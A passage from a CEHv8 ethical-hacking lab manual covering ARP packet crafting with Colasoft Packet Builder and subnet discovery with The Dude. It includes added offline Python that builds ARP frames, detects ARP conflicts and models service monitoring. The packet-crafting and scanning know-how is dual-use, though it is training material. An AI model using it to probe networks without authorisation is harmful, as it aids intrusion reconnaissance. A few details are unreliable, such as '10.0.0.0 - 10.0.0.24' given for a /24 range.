■ Colasoft Packet Builder, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A computer running Windows Server 2012 as the host machine
■ Windows 8 running on a virtual machine as the target machine
■ You can also download the latest version of Colasoft Packet Builder from the link http://www.colasoft.com/download/products/download_packet_builder.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A web browser with an Internet connection running on the host machine

Lab Duration

Time: 10 Minutes

Overview of Colasoft Packet Builder

Colasoft Packet Builder creates and sends custom network packets. This tool can be used to verify network protection against attacks and intruders. Colasoft Packet Builder features a decoding editor that lets users edit specific protocol field values much more easily. Users are able to edit the decoded information in two editors: the Decode Editor and the Hex Editor. Users can select any one of the provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet.
Lab Tasks

Task 1: Scanning Network

1. Install and launch the Colasoft Packet Builder.

2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 17.1: Windows Server 2012 - Desktop view

3. Click the Colasoft Packet Builder 1.0 app to open the Colasoft Packet Builder window.

Note: You can download Colasoft Packet Builder from http://www.colasoft.com.

FIGURE 17.2: Windows Server 2012 - Apps (the Start screen showing the Colasoft Packet Builder 1.0 tile)

4. The Colasoft Packet Builder main window appears.

Note: Operating system requirements: Windows Server 2003 and 64-bit Edition, Windows 2008 and 64-bit Edition, Windows 7 and 64-bit Edition.

FIGURE 17.3: Colasoft Packet Builder main screen (File, Edit, Send and Help menus; Import, Export, Add, Insert, Checksum and Send toolbar; Decode Editor, Hex Editor and Packet List panes; no packet selected)

5. Before starting your task, check that the Adapter settings are set to default and then click OK.

FIGURE 17.4: Colasoft Packet Builder Adapter settings. The Select Adapter dialog shows: Physical Address D4:BE:D9:C3:CE:2D; Link Speed 100.0 Mbps; Max Frame Size 1500 bytes; IP Address 10.0.0.7/255.255.255.0; Default Gateway 10.0.0.1; Adapter Status Operational; OK, Cancel, Help.

6. To add or create the packet, click Add in the menu section.

Note: There are two ways to create a packet, Add and Insert. The difference between these is the newly added packet's position in the Packet List. The new packet is listed as the last packet in the list if added, but after the current packet if inserted.

FIGURE 17.5: Colasoft Packet Builder creating the packet (toolbar: Import, Export, Add, Insert; Decode Editor)

7. When the Add Packet dialog box pops up, select the template and click OK.

Note: Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and *.cpf (Capsa 4.0 Packet File) formats. You may also import data from *.cap (Network Associates Sniffer packet files), *.pkt (EtherPeek v7/TokenPeek/AiroPeek v9/OmniPeek v9 packet files), *.dmp (TCPDUMP), and *.rawpkt (raw packet files).

FIGURE 17.6: Colasoft Packet Builder Add Packet dialog box (Select Template: ARP Packet; Delta Time: 0.1 Second; OK, Cancel, Help)

8. You can view the added packets list on the right-hand side of the window.

FIGURE 17.7: Colasoft Packet Builder Packet List (Packets: 1, Selected: 1; No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00)

9. Colasoft Packet Builder allows you to edit the decoded information in two editors: the Decode Editor and the Hex Editor.

Note: Burst Mode option: if you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option.

Decode Editor (Packet Num: 000001, Length: 64):
  Ethernet Type II
    Destination Address:     FF:FF:FF:FF:FF:FF   [0/6]
    Source Address:          00:00:00:00:00:00   [6/6]
    Protocol:                0x0806 (ARP)        [12/2]
  ARP - Address Resolution Protocol
    Hardware type:           1 (Ethernet)        [14/2]
    Protocol Type:           0x0800              [16/2]
    Hardware Address Length: 6                   [18/1]
    Protocol Address Length: 4                   [19/1]
    Type:                    1 (ARP Request)     [20/2]
    Source Physical:         00:00:00:00:00:00   [22/6]
    Source IP:               0.0.0.0             [28/4]
    Destination Physical:    00:00:00:00:00:00   [32/6]
    Destination IP:          0.0.0.0             [38/4]
  Extra Data
    Number of Bytes:         18 bytes            [42/18]
  FCS:                       0xF577BDD9

FIGURE 17.8: Colasoft Packet Builder Decode Editor

Hex Editor:
  0000  FF FF FF FF FF FF 00 00 00 00 00 00 08 06
  000E  00 01 08 00 06 04 00 01 00 00 00 00 00 00
  001C  00 00 00 00 00 00 00 00 00 00 00 00 00 00
  002A  00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0038  00 00 00 00
  Total: 60 bytes

FIGURE 17.9: Colasoft Packet Builder Hex Editor

10. To send all packets at one time, click Send All from the menu bar.

11. Check the Burst Mode option in the Send All Packets dialog window, and then click Start.

Note: Loop Sending option: this defines how many times the sending is repeated, one time by default. Enter zero if you want to keep sending packets until you pause or stop it manually.

FIGURE 17.10: Colasoft Packet Builder Send All button (toolbar: Checksum, Send, Send All Packets; Packet List: No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00, Destination FF:FF:FF:FF:FF:FF)

Note: Select a packet from the packet listing to activate the Send All button.

FIGURE 17.11: Colasoft Packet Builder Send All Packets

12. Click Start.

Note: The progress bar presents an overview of the sending process you are engaged in at the moment.

FIGURE 17.12: Colasoft Packet Builder Send All Packets. The dialog shows: Options - Adapter: Realtek PCIe GBE Family Controller (Select...); Burst Mode (no delay between packets); Loop Sending: 1 loops (zero for infinite loop); Delay Between Loops: 1000 milliseconds. Sending Information - Progress; Packets Sent: 1; Total Packets: 1. Buttons: Start, Stop, Close, Help.

13. To export the packets sent, from the File menu select File → Export → All Packets.

FIGURE 17.13: Export All Packets option (File menu: Import..., Export → All Packets..., Selected Packets..., Exit)

Note: Packets Sent: this shows the number of packets sent successfully. Colasoft Packet Builder also displays the packets sent unsuccessfully if there is a packet that was not sent out.

FIGURE 17.14: Select a location to save the exported file (Save As dialog; file type Colasoft Packet File (v6) (*.cscpkt))

FIGURE 17.15: Colasoft Packet Builder exporting the packet (Packets.cscpkt)
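The ARP template shown in the Decode Editor and Hex Editor (Figures 17.8 and 17.9) is easy to reproduce byte for byte, which is useful both for checking what the tool will put on the wire and for building detection on the receiving side. The Python below is an added example, not Colasoft's code: it builds the same 60-byte frame, decodes it field by field with the same [offset/length] view, prints it as a 14-byte-per-row hex dump, computes the FCS that Colasoft displays as a separate 4-byte trailer, and flags an IP address that is claimed by two different MAC addresses, the simplest sign of the ARP poisoning mentioned in the scenario. Nothing is transmitted; the reply frames used for the conflict check are constructed, and the MAC D4:BE:D9:C3:CE:2D and gateway 10.0.0.1 are taken from the adapter dialog in Figure 17.4.

```python
import struct
import zlib

ETHERTYPE_ARP = 0x0806
MIN_FRAME_LEN = 60          # Ethernet minimum without the 4-byte FCS
ARP_OPCODES = {1: "ARP Request", 2: "ARP Reply"}


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_frame(dst_mac="FF:FF:FF:FF:FF:FF", src_mac="00:00:00:00:00:00",
                    opcode=1, sender_mac="00:00:00:00:00:00", sender_ip="0.0.0.0",
                    target_mac="00:00:00:00:00:00", target_ip="0.0.0.0"):
    """Ethernet II header + 28-byte ARP body, zero-padded to 60 bytes.
    The defaults reproduce Colasoft's ARP Packet template exactly."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)   # Ethernet, IPv4, 6, 4, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    frame = eth + arp
    return frame + b"\x00" * max(0, MIN_FRAME_LEN - len(frame))   # "Extra Data"


def fcs(frame):
    """Frame check sequence: CRC-32 over the frame, little-endian on the wire.
    The NIC normally appends this; Colasoft shows it as a separate trailer."""
    return struct.pack("<I", zlib.crc32(frame) & 0xFFFFFFFF)


def decode_arp_frame(frame):
    """Decode Editor view: list of (field, value, offset, length)."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_ARP or len(frame) < 42:
        raise ValueError("not a complete ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    return [
        ("Destination Address", mac_str(frame[0:6]), 0, 6),
        ("Source Address", mac_str(frame[6:12]), 6, 6),
        ("Protocol", f"0x{ethertype:04X}", 12, 2),
        ("Hardware type", htype, 14, 2),
        ("Protocol Type", f"0x{ptype:04X}", 16, 2),
        ("Hardware Address Length", hlen, 18, 1),
        ("Protocol Address Length", plen, 19, 1),
        ("Type", ARP_OPCODES.get(op, op), 20, 2),
        ("Source Physical", mac_str(frame[22:28]), 22, 6),
        ("Source IP", ip_str(frame[28:32]), 28, 4),
        ("Destination Physical", mac_str(frame[32:38]), 32, 6),
        ("Destination IP", ip_str(frame[38:42]), 38, 4),
        ("Extra Data", f"{len(frame) - 42} bytes", 42, len(frame) - 42),
    ]


def hex_dump(frame, width=14):
    """Hex Editor view: hex offset followed by `width` bytes per row."""
    return [f"{off:04X} " + " ".join(f"{b:02X}" for b in frame[off:off + width])
            for off in range(0, len(frame), width)]


def arp_conflicts(frames):
    """Return (ip, first_mac, new_mac) whenever one IP is claimed by a second MAC,
    the basic indicator of ARP poisoning on a monitored segment."""
    claims, alerts = {}, []
    for frame in frames:
        fields = {name: value for name, value, _, _ in decode_arp_frame(frame)}
        ip, mac = fields["Source IP"], fields["Source Physical"]
        if ip == "0.0.0.0":            # probes and templates make no claim
            continue
        if ip in claims and claims[ip] != mac:
            alerts.append((ip, claims[ip], mac))
        claims.setdefault(ip, mac)
    return alerts


if __name__ == "__main__":
    template = build_arp_frame()
    for name, value, off, length in decode_arp_frame(template):
        print(f"{name:<24} {value!s:<20} [{off}/{length}]")
    print("\n".join(hex_dump(template)))
    print(f"Total {len(template)} bytes, FCS {fcs(template).hex()}")
```

The CRC is computed here only to show where Colasoft's 64-byte "Length" comes from (60 bytes plus a 4-byte FCS); on a real network the adapter generates it and most capture tools never show it, so do not expect the value you compute to match a trace.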

Lab Analysis

Analyze and document the results related to the lab exercise.

Tool/Utility: Colasoft Packet Builder

Information Collected/Objectives Achieved:
  Adapter Used: Realtek PCIe Family Controller
  Selected Packet Name: ARP Packets
  Result: The crafted packets are exported to Packets.cscpkt


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network.

2. Evaluate what types of instant messages Capsa monitors.

3. Determine whether the packet buffer affects performance. If yes, then what steps do you take to avoid or reduce its effect on software?

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs

Lab

Scanning Devices in a Network Using The Dude

The Dude automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.

Lab Scenario
In the previous lab you learned how packets can be crafted and sent using Colasoft Packet Builder. Attackers, too, can sniff a network: they capture and analyze packets to obtain specific network information. An attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network. As an expert ethical hacker, you should be able to gather information on an organization's network to check for vulnerabilities and fix them before an attacker gets to compromise the machines using those vulnerabilities. If you detect any attack that has been performed on a network, immediately implement preventive measures to stop any additional unauthorized access.

In this lab you will learn to use The Dude to scan the devices in a network. The tool alerts you when a monitored service stops responding, which is often the first visible sign that an attack has been performed on the network.

Lab Objectives

The objective of this lab is to demonstrate how to scan all devices within specified subnets, draw and lay out a map of your networks, and monitor services on the network.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
C E H Lab M anual Page 258

Lab Environment

To carry out the lab, you need:
■ The Dude, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\The Dude
■ You can also download the latest version of The Dude from http://www.mikrotik.com/thedude.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click The Dude installer and follow the wizard-driven installation steps to install The Dude
■ Administrative privileges to run tools

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Module 03 - Scanning Networks

Lab Duration

Time: 10 Minutes

Overview of The Dude

The Dude network monitor is a new application that can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and lay out a map of your networks, monitor services of your devices, and alert you in case some service has problems.

Lab Tasks

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 18.1: Windows Server 2012 - Desktop view

TASK 1: Launch The Dude

2. In the Start menu, to launch The Dude, click The Dude icon.
FIGURE 18.2: Windows Server 2012 - Start menu

3. The main window of The Dude will appear.

FIGURE 18.3: Main window of The Dude

4. Click the Discover button on the toolbar of the main window.

FIGURE 18.4: Select discover button

5. The Device Discovery window appears.

(Screenshot: the Device Discovery dialog, General tab, prompting "Enter subnet number you want to scan for devices", with the fields Scan Networks, Agent, Add Networks To Auto Scan, Black List, Device Name Preference, Discovery Mode (fast: scan by ping / reliable: scan each service), Recursive Hops, and Layout Map After Discovery Complete.)

FIGURE 18.6: Device discovery window

6. In the Device Discovery window, specify the Scan Networks range, select default from the Agent drop-down list, select DNS, SNMP, NETBIOS, IP from the Device Name Preference drop-down list, and click Discover.

(Screenshot: the same dialog filled in with Scan Networks 10.0.0.0/24, Agent default, Black List none, Device Name Preference DNS, SNMP, NETBIOS, IP, Discovery Mode fast (scan by ping), Recursive Hops 1.)

FIGURE 18.7: Selecting device name preference

7. Once the scan is complete, all the devices connected to a particular network will be displayed.

FIGURE 18.8: Overview of network connection

8. Select a device and place the mouse cursor on it to display the detailed information about that device.

FIGURE 18.9: Detailed information of the device

9. Now, click the down arrow for the Local drop-down list to see information on History Actions, Tools, Files, Logs, and so on.

FIGURE 18.10: Selecting Local information

10. Select options from the drop-down list to view complete information.

FIGURE 18.11: Scanned network complete information


11. As described previously, you may select all the other options from the drop-down list to view the respective information.

12. Once scanning is complete, click the button to disconnect.

FIGURE 18.12: Connection of systems in network
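The discovery settings chosen in step 6 (the Scan Networks range, the fast/reliable Discovery Mode and the Device Name Preference order) and the service alerting described in the overview, modelled as a short Python script. This is an added example, not code from the CEH lab and not The Dude's own implementation: it assumes nothing about The Dude's internals and sends no network traffic. All device records, service states and names (including files.lab.example and core-sw1) are constructed sample data.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Order shown in the lab's "Device Name Preference" drop-down: DNS, SNMP, NETBIOS, IP.
NAME_PREFERENCE = ("dns", "snmp", "netbios", "ip")


@dataclass
class Device:
    """One discovered host (constructed sample record, not real scan output).
    Name sources that discovery could not resolve stay None; services maps a
    probe name (ping, http, ...) to the last observed state, 'up' or 'down'."""
    ip: str
    dns: Optional[str] = None
    snmp: Optional[str] = None
    netbios: Optional[str] = None
    services: Dict[str, str] = field(default_factory=dict)


def scan_targets(cidr: str, blacklist: Tuple[str, ...] = ()) -> List[str]:
    """Expand a 'Scan Networks' entry such as 10.0.0.0/24 into the host
    addresses a discovery pass would probe, skipping black-listed networks."""
    net = ipaddress.ip_network(cidr, strict=False)
    blocked = [ipaddress.ip_network(b, strict=False) for b in blacklist]
    return [str(h) for h in net.hosts() if not any(h in b for b in blocked)]


def is_discovered(dev: Device, mode: str = "fast") -> bool:
    """Discovery Mode from the dialog: 'fast' trusts ping alone, 'reliable'
    counts a host as present if any probed service answers. A host that drops
    ICMP but still serves SMB or HTTP is found only in reliable mode."""
    if mode == "fast":
        return dev.services.get("ping") == "up"
    if mode == "reliable":
        return any(state == "up" for state in dev.services.values())
    raise ValueError(f"unknown discovery mode: {mode}")


def display_name(dev: Device, preference=NAME_PREFERENCE) -> str:
    """First name source in the preference order that resolved; 'ip' always resolves."""
    for source in preference:
        value = getattr(dev, source)
        if value:
            return value
    return dev.ip


def service_alerts(previous: Dict[str, Device],
                   current: Dict[str, Device]) -> List[Tuple[str, str, Optional[str], str]]:
    """Compare two polls and report every service whose state changed; this is
    the event a monitor raises as an alert. A host seen for the first time
    shows up as a change from None, so new devices on the subnet are flagged too."""
    alerts = []
    for ip, dev in current.items():
        old = previous.get(ip)
        for svc, state in dev.services.items():
            old_state = old.services.get(svc) if old else None
            if old_state != state:
                alerts.append((display_name(dev), svc, old_state, state))
    return alerts


def demo():
    """Run the model over constructed sample data (hypothetical hosts, not a real scan)."""
    targets = scan_targets("10.0.0.0/24", blacklist=("10.0.0.128/25",))
    first_poll = {
        "10.0.0.12": Device("10.0.0.12", snmp="core-sw1", netbios="CORE-SW1",
                            services={"ping": "up", "http": "up"}),
        "10.0.0.20": Device("10.0.0.20", dns="files.lab.example",
                            services={"ping": "down", "smb": "up"}),
    }
    second_poll = {
        "10.0.0.12": Device("10.0.0.12", snmp="core-sw1", netbios="CORE-SW1",
                            services={"ping": "up", "http": "down"}),
        "10.0.0.20": first_poll["10.0.0.20"],
        "10.0.0.40": Device("10.0.0.40", services={"ping": "up"}),
    }
    return targets, first_poll, second_poll, service_alerts(first_poll, second_poll)


if __name__ == "__main__":
    targets, first, second, alerts = demo()
    print(f"{len(targets)} addresses to probe, first {targets[0]}, last {targets[-1]}")
    for ip, dev in first.items():
        print(f"{ip}: shown as {display_name(dev)!r}, "
              f"fast={is_discovered(dev)}, reliable={is_discovered(dev, 'reliable')}")
    for name, svc, old, new in alerts:
        print(f"ALERT {name}: {svc} {old} -> {new}")
```

Two points the lab's dialog hides are visible in the run: the 10.0.0.20 host, which does not answer ping, is missed entirely in fast mode and only appears in reliable mode, and the second poll raises one alert for the HTTP service that went down on core-sw1 and one for the previously unseen 10.0.0.40 host.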

Lab Analysis

Analyze and document the results related to the lab exercise.

Tool/Utility: The Dude
Information Collected/Objectives Achieved:
■ IP Address Range: 10.0.0.0 - 10.0.0.24
■ Device Name Preferences: DNS, SNMP, NETBIOS, IP
■ Output: List of connected systems and devices in the network

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs